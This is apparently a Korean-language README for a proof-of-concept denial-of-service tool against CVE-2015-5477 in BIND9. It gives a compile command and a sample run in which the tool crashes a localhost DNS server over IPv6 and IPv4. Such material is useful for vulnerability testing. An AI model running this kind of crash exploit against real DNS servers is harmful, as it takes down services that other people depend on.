
PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure
이 익스플로잇은 BIND9 서버에 취약점이 있는지 확인하기 위해, 서버가 충돌하는지 보기 위해 익스플로잇을 보냅니다.
Unix/Windows에서 일반적인 방식으로 컴파일하는 C 코드입니다. 예를 들어:
# gcc tkill.c -o tkill
IPv4와 IPv6 모두에서 실행됩니다.
다음은 localhost에 대해 실행했을 때의 모습입니다. 이름을 확인할 때 두 개의 IP 주소를 얻으므로, 둘 다 시도합니다. 먼저 "version" 문자열을 질의한 다음 익스플로잇을 보냅니다. 두 번째 주소를 검사할 때는 첫 번째 시도에서 서비스가 이미 충돌했기 때문에 버전 질의가 실패합니다.
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed